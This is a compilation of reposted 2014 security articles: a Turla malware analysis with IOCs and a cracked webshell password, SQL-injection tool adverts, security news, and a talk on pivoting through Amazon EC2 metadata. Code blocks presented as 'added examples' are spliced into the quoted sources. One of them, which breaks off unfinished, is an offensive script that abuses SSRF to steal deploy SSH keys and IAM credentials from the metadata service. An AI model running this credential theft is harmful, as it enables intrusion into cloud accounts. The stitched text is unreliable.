Compiled: Thu Nov 08 11:05:35 2012

Another example:

Size: 218,112 bytes
MD5: 071d3b60ebec2095165b6879e41211f2
Compiled: Thu Nov 08 11:04:39 2012

This backdoor is more sophisticated and belongs to the next level of cyber-espionage tools called the "Carbon system" or Cobra by the Turla attackers. Several plugins for the "Carbon system" are known to exist.

Decoded configuration for e9580b6b13822090db018c320e80865f

Note: the command and control servers www.losguayaberos[.]com and thebesttothbrushes[.]com have been sinkholed by Kaspersky Lab.

Other packages delivered to the victims include:

MD5: c7617251d523f3bc4189d53df1985ca9
MD5: 0f76ef2e6572befdc2ca1ca2ab15e5a1

These top level packages deploy both updated Epic backdoors and Turla Carbon system backdoors to confirmed victims, effectively linking the Epic and Turla Carbon operations together.
The Turla Carbon dropper from these packages has the following properties:

MD5: cb1b68d9971c2353c2d6a8119c49b51f

This is called internally by the authors "Carbon System", part of the "Cobra" project, as can be seen from the debug path inside:

This acts as a dropper for the following modules, both 32 and 64 bit:

MD5                                Resource number
4c1017de62ea4788c7c8058a8f825a2d   101
43e896ede6fe025ee90f7f27c6d376a4   102
e6d1dcc6c2601e592f2b03f35b06fa8f   104
554450c1ecb925693fedbb9e56702646   105
df230db9bddf200b24d8744ad84d80e8   161
91a5594343b47462ebd6266a9c40abbe   162
244505129d96be57134cb00f27d4359c   164
4ae7e6011b550372d2a73ab3b4d67096   165

The Carbon system is in essence an extensible platform, very similar to other attack platforms such as the Tilded platform or the Flame platform. The plugins for the Carbon system can be easily recognized as they always feature at least two exports named:

- ModuleStart
- ModuleStop

Carbon system plugin with characteristic exports

Several Epic backdoors appear to have been designed to work as Carbon system plugins as well - they require a specialized loader to start in victim systems that do not have the Carbon system deployed.

Some modules have artifacts which indicate the Carbon system is already at version 3.x, although the exact Carbon system version is very rarely seen in samples:

The author of the Carbon module above can also be seen in the code, as "gilg", who also authored several other Turla modules.

We are planning to cover the Turla Carbon system with more details in a future report.
Language artifacts

The payload recovered from one of the mothership servers (at newsforum.servehttp[.]com/wordpress/wp-includes/css/img/upload.php, MD5: 4dc22c1695d1f275c3b6e503a1b171f5, Compiled: Thu Sep 06 14:09:55 2012) contains two modules, a loader/injector and a backdoor. Internally, the backdoor is named "Zagruzchick.dll":

The word "Zagruzchick" means "boot loader" in Russian.

The Control panel for the Epic motherships also sets the language to codepage "1251":

Codepage 1251 is commonly used to render Cyrillic characters.

There are other indications that the attackers are not native English language speakers:

- Password it´s wrong!
- Count successful more MAX
- File is not exists
- File is exists for edit

The sample e9580b6b13822090db018c320e80865f that was delivered to several Epic victims as an upgraded backdoor has the compilation code page language set to "LANG_RUSSIAN".

The threat actor behind the "Epic" operation uses mainly hacked servers to host their proxies. The hacked servers are controlled through the use of a PHP webshell. This shell is password protected; the password is checked against an MD5 hash:

The MD5 "af3e8be26c63c4dd066935629cf9bac8" has been solved by Kaspersky Lab as the password "kenpachi".

In February 2014 we observed the Miniduke threat actor using the same backdoor on their hacked servers, although using a much stronger password. Once again, it is also interesting to point out the usage of Codepage 1251 in the webshell, which is used to render Cyrillic characters. There appear to be several links between Turla and Miniduke, but we will leave that for a future blogpost.

Victim statistics

On some of the C&C servers used in the Epic attacks, we were able to identify detailed victim statistics, which were saved for debugging purposes by the attackers.
This is the country distribution for the top 20 affected countries by victim's IP:

According to the public information available for the victims' IPs, targets of "Epic" belong to the following categories:

- Government
  - Ministry of interior (EU country)
  - Ministry of trade and commerce (EU country)
  - Ministry of foreign/external affairs (Asian country, EU country)
  - Intelligence (Middle East, EU Country)
- Embassies
- Military (EU country)
- Education
- Research (Middle East)
- Pharmaceutical companies
- Unknown (impossible to determine based on IP/existing data)

Summary

When G-Data published their Turla paper, there were few details publicly available on how victims get infected with this malware campaign. Our analysis indicates this is a sophisticated multi-stage infection, which begins with Epic Turla. This is used to gain a foothold and validate the high profile victim. If the victim is interesting, they get upgraded to the Turla Carbon system.

Most recently, we observed this attack against a Kaspersky Lab user on August 5, 2014, indicating the operation remains fresh and ongoing.

Note: A full analysis of the Epic attacks is available to the Kaspersky Intelligent Services customers.
Contact: intelreports@kaspersky.com

We would like to add the following at the end of the blogpost, right before the detection names:

Further reading

If you'd like to read more about Turla/Uroburos, here are a few recommendations:

- G-Data's paper "Uroburos Highly complex espionage software with Russian roots"
- BAE Systems analysis of "The Snake campaign"
- "Uroburos: the snake rootkit", technical analysis by deresz and tecamac
- "TR-25 Analysis - Turla / Pfinet / Snake/ Uroburos" by CIRCL.LU

Kaspersky products' detection names for all the malware samples described in this post:

Technical Appendix with IOCs

Source: The Epic Turla Operation - Securelist
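The post notes that Carbon system plugins can be recognised by two exports, ModuleStart and ModuleStop. The following is an added triage check for that characteristic, written for this page and not Kaspersky's tooling: a dependency-free export-table reader for PE32/PE32+ images, plus a constructed minimal PE (not a real sample) used as offline test input; the function and file names are assumptions.

```python
import struct


def _rva_to_offset(sections, rva):
    """Map an RVA to a file offset using the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA %#x is not mapped by any section" % rva)


def pe_export_names(data):
    """Return the symbol names listed in the export directory of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image (missing MZ header)")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image (missing PE signature)")
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt_off = pe_off + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    # Data directories start 96 bytes into a PE32 optional header, 112 for PE32+;
    # entry 0 is the export table.
    dir_off = opt_off + (96 if magic == 0x10B else 112)
    export_rva = struct.unpack_from("<I", data, dir_off)[0]
    if export_rva == 0:
        return []                       # image exports nothing
    sections = []
    sec_off = opt_off + opt_size        # section headers follow the optional header
    for i in range(num_sections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, sec_off + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    exp_off = _rva_to_offset(sections, export_rva)
    num_names = struct.unpack_from("<I", data, exp_off + 24)[0]   # NumberOfNames
    names_rva = struct.unpack_from("<I", data, exp_off + 32)[0]   # AddressOfNames
    names_off = _rva_to_offset(sections, names_rva)
    names = []
    for i in range(num_names):
        name_rva = struct.unpack_from("<I", data, names_off + 4 * i)[0]
        start = _rva_to_offset(sections, name_rva)
        names.append(data[start:data.index(b"\0", start)].decode("ascii", "replace"))
    return names


CARBON_PLUGIN_EXPORTS = {"ModuleStart", "ModuleStop"}


def has_carbon_plugin_exports(data):
    """Triage rule from the post: Carbon plugins always export both names."""
    return CARBON_PLUGIN_EXPORTS <= set(pe_export_names(data))


def build_minimal_dll(export_names):
    """Constructed test input: a minimal PE32 image containing only an export
    table with the given names. It is not a real sample and cannot execute."""
    sec_rva, sec_raw = 0x1000, 0x200
    n = len(export_names)
    funcs_rva = sec_rva + 40            # the export directory itself is 40 bytes
    names_rva = funcs_rva + 4 * n
    ords_rva = names_rva + 4 * n
    str_rva = ords_rva + 2 * n
    strings, name_rvas = b"", []
    for name in export_names:
        name_rvas.append(str_rva + len(strings))
        strings += name.encode("ascii") + b"\0"
    dll_name_rva = str_rva + len(strings)
    strings += b"constructed.dll\0"
    body = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, dll_name_rva, 1, n, n,
                       funcs_rva, names_rva, ords_rva)
    body += b"".join(struct.pack("<I", 0) for _ in range(n))       # function RVAs (unused)
    body += b"".join(struct.pack("<I", r) for r in name_rvas)      # AddressOfNames array
    body += b"".join(struct.pack("<H", i) for i in range(n))       # name ordinals
    body += strings
    opt_size = 96 + 16 * 8              # PE32 optional header plus 16 data directories
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x2102)
    opt = struct.pack("<H", 0x10B).ljust(96, b"\0")
    dirs = struct.pack("<II", sec_rva, len(body)) + b"\0" * (15 * 8)
    section = b".edata\0\0" + struct.pack("<IIIIIIHHI", len(body), sec_rva, sec_raw,
                                          sec_raw, 0, 0, 0, 0, 0x40000040)
    header = (dos + coff + opt + dirs + section).ljust(sec_raw, b"\0")
    return header + body.ljust(sec_raw, b"\0")


if __name__ == "__main__":
    for names in (["ModuleStart", "ModuleStop", "DllMain"], ["DllMain", "GetVersion"]):
        print(names, "->", has_carbon_plugin_exports(build_minimal_dll(names)))
```

On real files, read the bytes from disk and pass them to has_carbon_plugin_exports; the export-name match is a triage hint to be confirmed by further analysis, not a verdict on its own.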
-
pangolin

Pangolin is a penetration testing, SQL Injection test tool for database security. It finds SQL Injection vulnerabilities. Its goal is to detect and inform you of SQL injection vulnerabilities in web applications. Once it detects an SQL injection on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Documentation

- Pangolin White Paper
- Pangolin Data Sheet
- Pangolin User Guide

Video Demonstration

- Inject SQL Server
- Inject MySQL
- More Demos Here

ScreenShot

Pangolin FAQ

Click Here

Database support: Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, Sybase.

Pangolin is recommended by many Web security experts all over the world.

OWASP: http://www.owasp.org/index.php/SQL_Injection#References
Red Database Security: 1. Oracle Security Videos 2. http://blog.red-database-security.com/2009/03/05/web-application-testing-with-pangolin-video-screenshot/print/
SECURITY DATABASE: http://www.security-database.com/toolswatch/Focus-on-Pangolin-SQL-Injection.html

Features

Here are some of the features:

- HTTPS support
- Pre-Login
- Proxy
- Specify any HTTP headers (User-agent, Cookie, Referer and so on)
- Bypass firewall setting
- Auto-analyzing keyword
- Detailed check options
- Injection-points management

15 Days Full Function (No Limitation) Trial

Source: pangolin « NOSEC – Serving More People
-
jsky

What is JSky?

JSky is a web vulnerability scanner and web application vulnerability assessment tool.

Documentation

- JSky White Paper
- JSky Data Sheet
- JSky Quick Start
- JSky User Guide

ScreenShot

Video Demonstration

Quick Scan Your Website With NOSEC JSky

What can JSky do?

JSky is a Web Application Security Vulnerability scanner that can scan for the following Web Application Security Vulnerabilities:

* SQL Injection
* Cross-Site Scripting
* Insecure Indexing
* Local path disclosure
* Server Misconfiguration
* And all web application threats.

And JSky is not only a scanner, but also an assessment tool.

Why should I use JSky?

Look at these features and benefits; we think you will love it right away:

1. Powerful web spider and multi-threaded scanner crawls hundreds of thousands of pages with ease, and also supports extracting links from JavaScript and flash.
2. Advanced and in-depth SQL injection testing from our Pangolin software, which precisely locates security vulnerabilities. Our software uses proprietary methods that go beyond pattern matching. This is what enables us to be so precise in locating security vulnerabilities.
3. JSky provides both an XML based vulnerability file, and an integrated security vulnerability executive parser. This makes it easy to design a vulnerability test. All you need to do is edit the XML file – no further compatibility coding required.
4. Easy to use. We have worked hard to create a product that does not require advanced internet security knowledge.

The value of JSky

JSky can inspect all aspects of your Web application, looking for vulnerabilities in your website. Using advanced artificial hacking intelligence, JSky probes your site’s defenses to find the areas that require further attention. JSky lets you see what a hacker would see if he were attacking your site. This knowledge allows you to fix the vulnerability.
A few examples of people that will benefit from JSky include:

* Penetration tester
* Website administrator
* And so much more……

Security on the web is of the utmost importance. Without Web application testing, credit card transactions can be easily compromised. Thus, for processing with credit cards, PCI DSS compliance is enforced. Consultants using JSky provide web security services to help you match PCI DSS.

System Requirements

* 1 GB of memory
* 2 GB of free disk space
* 1.5 GHz Processor or better
* Windows 2000/Windows XP/Windows 2003/Windows Vista/Windows7

Keywords: information security, security on web, web application testing, web applications security, web vulnerability scanner, security assessment, PCI DSS, web security service, vulnerability assessments.

15 Days Full Function (No Limitation) Trial

Source: jsky « NOSEC – Serving More People
-
[h=1]PCLinuxOS 2014.07 Arrives with Linux Kernel 3.15.4 and KDE 4.12.3 – Gallery[/h]

August 7th, 2014, 11:55 GMT · By Silviu Stahie

PCLinuxOS 2014.07, a free Linux distribution aimed at desktop computers and laptops and relying on KDE, has been released with numerous package updates.

PCLinuxOS comes with many flavors, but the default is actually KDE. The developers also make a few other versions, like KDE MiniMe, LXDE, or FullMonty, but this is the main one downloaded by most users. The distribution actually follows a rolling release model, which means that new major features and other changes are introduced regularly through the update channel. Every month, the download ISOs are regenerated with the new update, but if you already have the operating system installed you only have to update it regularly.

“The KDE MiniMe iso provides a basic KDE desktop and is intended for advanced users who know how to fine-tune their system. To keep this iso small no printer drivers are included. The KDE Full Version ISO provides a standard KDE desktop with many popular applications and out-of-the-box driver support for generic desktop computing,” reads the official announcement.

According to the changelog, the Linux kernel now used in the distribution is 3.15.4, which is one of the most recent. It's not exactly top-of-the-line, but it's new enough that users won't have any problems with newer hardware. PCLinuxOS is still using KDE 4.12.3, which is a rather old version. The developers of this distro have been using this desktop for quite some time, but an upgrade should arrive pretty soon.

Also, Nvidia and ATI fglrx driver support is available, multimedia playback support for many popular formats has been added, the LibreOffice Manager can install LibreOffice supporting over 100 languages, and MyLiveCD allows users to take a snapshot of the installation.
The developers have also explained that “in case of low or missing speaker volume users need to click the speaker-icon at the bottom right of the panel, then on ‘Mixer’, and raise the volume sliders.”

The system requirements for this interesting OS are quite low, if you want to give it a try. Users will need a modern Intel or AMD processor (preferably for 32-bit), 1 GB or more RAM memory (recommended 4 GB+), 10 GB or more HDD space, and NVIDIA, ATI HD 4000, or better graphics card to enjoy the 3D desktop and all the effects.

More details about this Linux distribution can be found in the official changelog. You can download PCLinuxOS 2014.07 right now from Softpedia. A new version of the more complete PCLinuxOS FullMonty should also arrive pretty soon.

[h=2]PCLINUXOS - PHOTO GALLERY:[/h]

Source: PCLinuxOS 2014.07 Arrives with Linux Kernel 3.15.4 and KDE 4.12.3 – Gallery
-
[h=1]Blackhat 2014[/h] Built binaries for BH2014 Digging for Sandbox Escapes workshop. Link: https://github.com/tyranid/bh2014
-
Bug Bounty Program: Cash Rewards for Reported Vulnerabilities » Indeed Engineering Blog
-
Car Hacking Enters Remote Exploitation Phase

by Michael Mimoso

LAS VEGAS – Charlie Miller and Chris Valasek have proven to be adept backseat drivers. Noted for their car-hacking exploits, Miller and Valasek have gained fame at hacking conferences and on Fox News for forcing automobiles to do their bidding. However, until today’s talk at the Black Hat 2014 conference, the two researchers’ exploits required them to be plugged in directly to their targets, literally sitting in the back seat of an automobile injecting code into its computers.

No more.

Miller and Valasek delivered a brisk talk explaining the soft spots in automobile networks that open a car up to remote exploit. They also provided a quick overview of specific car makers’ and models’ exploitability and demonstrated their version of an intrusion detection system that blocks some of their remote exploits.

“We looked for a big attack surface,” said Miller, a security engineer at Twitter.

Remote car attacks don’t look much different than attacks against conventional networks, Miller said. Attackers need a vulnerability in a wireless communication protocol, such as Bluetooth, and then take that over in order to have the ability to pass messages to different functions of the car, such as steering or braking.

The researchers said that many car manufacturers segment their autos’ internal networks, forcing communication through a centralized bus that would require a hacker to go through two hops in order to force the car to brake hard or take over steering, for example. Some vehicles, such as the Cadillac Escalade 2015, have a radio module that sits on a low- and high-speed bus, they said, enabling a hacker to send messages to both ends if they’re able to get in.

“Car hacking is hard,” Miller said. “There’s lots of complexity, and the more technology you introduce, the more problems you have.”

Further complicating the scenario is the difficulty in patching automobile software.
Valasek said there are significant costs to the manufacturer, not only in producing the patch, but also in contacting customers who then must take their vehicles to a dealer for a software update.

“It’s going to be really hard when an exploit comes out and everyone has a vulnerability that needs to be fixed,” said Valasek, director of vehicle security research at IOActive.

Once an attacker finds a vulnerability that allows him to send messages over Bluetooth, for example, it’s helpful if the vehicle has a lot of what the researchers call cyber-physical features to exploit. Some of those include self-parking, active lane control, pre-collision systems and adaptive cruise control. All of those require some communication between a sensor and the brakes, acceleration or steering, usually over Bluetooth or some other radio signal.

Some features are more inviting to attackers than others. The passive antitheft system, tire pressure monitoring system or remote keyless entry offer a limited attack surface, either because they don’t exchange a lot of data or require close proximity for communication. Bluetooth capabilities, the radio data system and telematics systems that allow cellular or Wi-Fi capabilities significantly expand a car’s attack surface. Worse, on the horizon are either in-car apps, or connectivity to the Internet via a web browser.

“Lots more people know how to write a Web exploit than a TPMS exploit,” Valasek said. “A lot of people can write a malicious app, or pop a browser. If that’s on the same network as your brakes or steering, that’s bad.”

“This is growing, and the scariest area,” Miller added.

Valasek said his and Miller’s goals for this segment of their research were to look at a broader scope of cars, how they communicate wirelessly to the outside world, and provide a lightweight Consumer Reports-type of rating system.

“Why can’t we as an industry start rating automobiles, and hopefully that promotes changes within organizations,” Valasek said.
Miller and Valasek said they will release a 95-page paper detailing their findings on a number of new automobiles from Audi, Honda, Infiniti, Jeep, Dodge and others.

Source: Car Hacking Enters Remote Exploitation Phase at Black Hat | Threatpost | The first stop for security news
-
Malicious SHA-1

TL;DR: If the four 32-bit constants of SHA-1 can be modified, then exploitable collisions can be constructed. No need to panic, this doesn’t affect the original SHA-1. However, vendors and customers of products with custom cryptography will be interested.

Summary

This is the webpage of the Malicious SHA-1 project, a research project that demonstrates how the security of the SHA-1 hashing standard can be fully compromised if one slightly tweaks some of the predefined constants in the SHA-1 algorithm. That is, we show that systems using “custom” versions of SHA-1 may include backdoors exploitable by the designers. Such custom versions of cryptographic standards are typically found in proprietary systems as a way to personalize the cryptography for a given customer, while retaining the security guarantees of the original algorithm.

The colliding messages constructed can be valid archive files (RAR or 7zip) such that the content of the two archives can be fully controlled. We also build colliding JPEG files, which can be any two images, as in the example below (images were chosen at random):

We can also construct colliding executables, with MBR (Master Boot Record) or COM files including arbitrary code. Furthermore, we present polyglot malicious SHA-1 instances, that is, for which the designer can create colliding files of different types with arbitrary content (for example: any two MBRs, any two RAR archives, and any two shell scripts).

The Malicious SHA-1 project was presented in 2014 at the following security and cryptography conferences:

- BSidesLV (Aug 5; Las Vegas, USA)
- DEF CON Skytalks (Aug 9; Las Vegas, USA)
- Selected Areas in Cryptography (Aug 14-15; Montreal, Canada)

Implications of this research are discussed in our FAQ. More details are given below, and a full description of our work is reported in the research paper.

Source: https://malicioussha1.github.io/
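The tweak the project describes, with the four round constants made explicit, as an added example that is not the project's own code: a plain SHA-1 whose four 32-bit constants are parameters, and a known-answer check that a reviewer of a product's "custom" SHA-1 can run to confirm the function still matches the standard. The function and constant names are this example's assumptions.

```python
import hashlib
import struct

# The four 32-bit round constants of standard SHA-1 (FIPS 180-4). These are the
# values the Malicious SHA-1 project replaces to obtain a backdoored variant.
STANDARD_K = (0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6)
MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def sha1_with_constants(message, k=STANDARD_K):
    """SHA-1 over `message` (bytes) using the round constants in `k`.
    With k == STANDARD_K this is exactly FIPS 180-4 SHA-1; any other k is a
    'custom' SHA-1 of the kind the project shows can hide collisions."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]
    # Padding: a 0x80 byte, zeros up to 56 mod 64, then the 64-bit bit length.
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    padded += struct.pack(">Q", len(message) * 8)
    for start in range(0, len(padded), 64):
        w = list(struct.unpack(">16I", padded[start:start + 64]))
        for i in range(16, 80):                     # message schedule
            w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
        a, b, c, d, e = h
        for i in range(80):                         # 80 rounds, 4 constant groups
            if i < 20:
                f, kk = (b & c) | ((~b) & d), k[0]
            elif i < 40:
                f, kk = b ^ c ^ d, k[1]
            elif i < 60:
                f, kk = (b & c) | (b & d) | (c & d), k[2]
            else:
                f, kk = b ^ c ^ d, k[3]
            tmp = (_rotl(a, 5) + f + e + kk + w[i]) & MASK32
            a, b, c, d, e = tmp, a, _rotl(b, 30), c, d
        h = [(x + y) & MASK32 for x, y in zip(h, (a, b, c, d, e))]
    return struct.pack(">5I", *h).hex()


# Published known-answer vectors (FIPS 180-4 / RFC 3174) for standard SHA-1.
KNOWN_ANSWERS = {
    b"": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
    b"abc": "a9993e364706816aba3e25717850c26c9cd0d89d",
    b"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq":
        "84983e441c3bd26ebaae4aa1f95129e5e54670f1",
}


def is_standard_sha1(hash_fn):
    """True if `hash_fn(bytes) -> hex digest` agrees with standard SHA-1 on the
    known-answer vectors and on a multi-block message; an implementation with
    altered constants fails this check on every vector."""
    for msg, digest in KNOWN_ANSWERS.items():
        if hash_fn(msg) != digest:
            return False
    long_msg = bytes(range(256)) * 3            # 768 bytes: spans several blocks
    return hash_fn(long_msg) == hashlib.sha1(long_msg).hexdigest()


if __name__ == "__main__":
    tweaked = (0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D7)   # last constant +1
    print("standard :", is_standard_sha1(sha1_with_constants))
    print("tweaked  :", is_standard_sha1(lambda m: sha1_with_constants(m, tweaked)))
```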
-
Blackhat USA Multipath TCP Tool Release & Audience Challenge

We hope everyone found something interesting in our talk today on Multipath TCP. We’ve posted the tools and documents mentioned in the talk at: https://github.com/Neohapsis/mptcp-abuse

At the end we invited participants to explore MPTCP in a little more depth via a PCAP challenge. Without further ado, here’s the PCAP: neohapsis_mptcp_challenge.pcapng

It’s a simple scenario: one MPTCP-capable machine sending data to another. The challenge is “simply” to reassemble and recover the original data. The data itself is not complex so you should be able to tell if you’re on the right track, but getting it exactly right will require some understanding of how MPTCP works.

If you think you have it, tweet us and follow us (@secvalve and @coffeetocode) and we’ll PM you to check your solution. You can also ask for questions/clarifications on twitter; use #BHMPTCP so others can follow along. Winner snags a $100 Amazon gift card!

Hints

#0: The latest version of Wireshark supports decoding mptcp options (see “tcp.options.mptcp”). The scapy version in the git repo is based on Nicolas Maitre’s and supports decoding mptcp options. It will help although you don’t strictly need it.

- There is an MPTCP option field to tell the receiver how a tcp packet fits into the overall logical mptcp data flow (what it is and how it works is an exercise for the user)
- It’s possible to get close with techniques that don’t fully understand MPTCP (you’ll know you’re close). However the full solution should match exactly (we’ll use md5sum)

Depending on how people do and questions we get, we’ll update here with a few more hints tonight or tomorrow. Once we’ve got a winner, we’ll post the solution and code examples.

Source: Neohapsis Labs | Blackhat USA Multipath TCP Tool Release & Audience Challenge
-
[h=1]Kaspersky Warns of Old Windows Flaw That’s Being Aggressively Exploited Right Now[/h]

August 7th, 2014, 07:08 GMT · By Bogdan Popa

Security vendor Kaspersky has warned today that an old vulnerability in Windows, which has already been patched by Microsoft, is being actively exploited right now by cybercriminals worldwide, so customers should accelerate their patching process to make sure they’re secure.

Flagged by Microsoft as CVE-2010-2568, the vulnerability was being used by hackers in cyber attacks against Iran’s nuclear program and was first reported to the software giant in 2010, with a patch released soon after that.

“Despite this, Kaspersky Lab detection systems are still registering tens of millions of detections of CVE-2010-2568 exploits. Over the study period, more than 50 million detections on more than 19 million computers worldwide were recorded,” Kaspersky explains.

According to the same report, the vulnerability affects all Windows versions on the market with the exception of Windows 8 and 8.1, but given the fact that the majority of users are now running Windows XP and 7, it’s critical to patch these systems as soon as possible.

As for the causes that are making exploits possible, Kaspersky says that “it is an error in processing tags in Windows OS enabling the download of random dynamic library without the user’s awareness.” Hackers could thus drop malware on vulnerable computers, which could be then used in new attacks or for spreading malware to even more systems that are yet to be patched.

“The first malware exploiting this vulnerability was registered in July 2010. The worm Sality uses this vulnerability to distribute its own code: Sality generates vulnerable tags and distributes them through the LAN. If a user opens a folder containing one of these vulnerable tags, the malicious program immediately begins to launch. After Sality and Stuxnet this vulnerability was used by the well-known Flame and Gauss spyware,” Kaspersky explains.
At this point, computers in Vietnam, China, and India are said to be the most vulnerable to attacks because the patch released by Microsoft in 2010 is yet to be installed on these systems.

“Vietnam (42.45%), India (11.7%) and Algeria (5.52%) are among the leaders for the number of Kaspersky Lab detections of one of the most dangerous Windows vulnerabilities currently known. Interestingly, according to our research, the outdated XP OS is also widely used in all these countries,” it says.

Of course, the popularity of Windows XP is still causing issues, as 25 percent of the world’s desktop computers are still said to be running this particular operating system. Microsoft stopped providing support for Windows XP in April 2014, so no other updates and security patches are being released for this OS version. The old CVE-2010-2568 fix is however available via Windows Update.

Source: Kaspersky Warns of Old Windows Flaw That’s Being Aggressively Exploited Right Now
-
[h=1]FBI infected PCs on a large scale to persecute alleged criminals[/h]

by paganinip on August 7th, 2014

[h=2]A report disclosed by Wired suggests that the FBI is using a malware to identify Tor users by infecting machines on a large scale.[/h]

It’s not a mystery that usage of the Tor network represents a problem for investigators of law enforcement agencies and for government entities that need to track users on the popular anonymizing network.

Last year the FBI dismantled the Tor hosting service Freedom Hosting in a large scale investigation on child pornography. The FBI used malicious code able to exploit a Firefox zero-day in Firefox 17 that allowed it to track Tor users. The malware implants a tracking cookie which fingerprinted suspects through a specific external server.

The exploit is based on a Javascript that is a tiny Windows executable hidden in a variable dubbed “Magneto”. Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to the FBI Virginia server exposing the victim’s real IP address. The script sends back the data with a standard HTTP web request outside the Tor Network.

Article: FBI infected PCs on a large scale to persecute alleged criminals | Security Affairs
-
Sulo

Sulo is a dynamic instrumentation tool for Adobe Flash Player. It is built on Pin.

Supported Flash versions

The following Flash Player builds are supported:

- 10.3.181.23 standalone debug
- 10.3.181.23 standalone non-debug
- 10.3.181.23 ActiveX
- 11.1.102.62 standalone non-debug
- 11.1.102.62 ActiveX

You can add support for another Flash Player build by specifying some RVAs and offsets in FlashPlayerConfigBuilder.cpp.

Limitations

Sulo supports ActionScript3 method calls only - AVM1 is not (yet) supported.

Building

The easiest way to build Sulo is to use the sulo_vs2010.sln solution file with Visual Studio 2010.

1. Download Intel Pin kit for Visual Studio 2010
2. Extract the ZIP
3. Clone Sulo to pin-2.13-65163-msvc10-windows\source\tools\Sulo
4. Open sulo_vs2010.sln and build the solution

Plugins

Sulo comes with three plugins:

- Call tracer - logs all ActionScript method calls, including arguments and return values
- Flash dumper - dumps Flash objects loaded with Loader.loadBytes() to disk
- SecureSWF - logs decrypted strings from secureSWF-protected files

Creating your own plugin is easy: just inherit your class from ISuloPlugin, implement the virtual methods, and add the object to m_plugins in SuloPluginManager::init().

Source: https://github.com/F-Secure/Sulo
-
DeepSec 2013 Talk: Pivoting In Amazon Clouds

The „cloud“ infrastructure is a crucial part of information technology. Many companies take advantage of outsourced computing and storage resources. Due to many vendors offering a multitude of services, the term „cloud“ is often ill-defined and misunderstood. This is a problem if your IT security staff needs to inspect and configure your „cloud“ deployment with regards to security. Of course, virtualisation technology can be hardened, too. However the „cloud“ infrastructure brings its own features into the game. This is where things get interesting and where you have to broaden your horizon.

Andres Riancho will show you in his talk Pivoting In Amazon Clouds what pitfalls you can expect when deploying code and data in the Amazon Cloud. Classical security tests won’t be enough. The Amazon Elastic Compute Cloud (EC2) is more than just virtual iron. You also get to think about instance life cycles (remember that virtual systems are very volatile), (user) data, AWS Identity and Access management (IAM) roles, and more “meta stuff” attached to your AWS infrastructure. What else is there? Let’s give you some in-depth information from Andres’ talk.

EC2 Instance Meta-Data

All EC2 instances have meta-data, such as the used Amazon Machine Images (AMI), kernel and region. This meta-data is made available to the instance through a web server (only accessible to that particular instance) which lives at http://169.254.169.254/. Amazon’s meta-data documentation better explains all the details about the instance meta-data and how to access it.
From the information security perspective the important information available in the meta-data is:
local IP address
user data
instance profile (AWS API credentials, explained later)
Amazon Machine Image (AMI)

When creating a new EC2 instance, or defining a launch configuration which will be used together with auto scaling groups, the AWS administrator can provide a script which will be run by the EC2 instance operating system as one of the last boot steps. This script, also called user data, is stored by AWS in the instance meta-data and retrieved by the OS during boot. In Ubuntu the cloud-init daemon is responsible for retrieving and running this script. User data scripts are a common way to configure EC2 instances. They install base packages and a git client, define variables (for source repositories, etc.), download application source code, compile code, or start required daemon processes. Since in most cases the repository holding the instance’s application source code is private, SSH keys are used to access it. GitHub, BitBucket and other widely used source repositories call these “Deploy SSH Keys”. The SSH keys used to access the repository are usually hard-coded into the user data script, or stored in an alternate location from which the script downloads them. This represents a risk when, because of a vulnerability, an attacker is able to proxy HTTP GET requests through the EC2 instance, which allows him to retrieve the user data script from the meta-data. In other words, if there is a way for the attacker to make any of the services running on the instance perform an HTTP GET request to an arbitrary URL and return the HTTP response body, then he gets the repository URL, branch and SSH keys, and with them access to the application source.
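The metadata-theft path described above, as an added example that is not part of the talk or of any tool it mentions: a script that walks the metadata service through whatever server-side request primitive the vulnerable application provides, pulls the deploy key and repository out of the user-data script, and collects the instance-profile credentials (the temporary key, secret and token that the next section covers). The fetch primitive is simulated by a constructed dictionary standing in for http://169.254.169.254/, so it runs offline; the metadata paths and the JSON credential format are the documented AWS ones, while the role name, key material and credentials are invented. The last function is the defender-side check you would put in front of any URL-fetching feature.

```python
import ipaddress
import json
import re
from typing import Callable, Dict, Optional
from urllib.parse import urlsplit

METADATA_BASE = "http://169.254.169.254"
USER_DATA_PATH = "/latest/user-data"
IAM_CREDS_PATH = "/latest/meta-data/iam/security-credentials/"

# Constructed stand-in for the metadata service of one instance. The paths are
# the real ones; the key material, role name and credentials are invented.
FAKE_METADATA: Dict[str, str] = {
    USER_DATA_PATH: (
        "#!/bin/bash\n"
        "apt-get install -y git\n"
        "cat > /root/.ssh/id_rsa <<'EOF'\n"
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "MIIEowIBAAKCAQEAfakeexamplekeymaterial\n"
        "-----END RSA PRIVATE KEY-----\n"
        "EOF\n"
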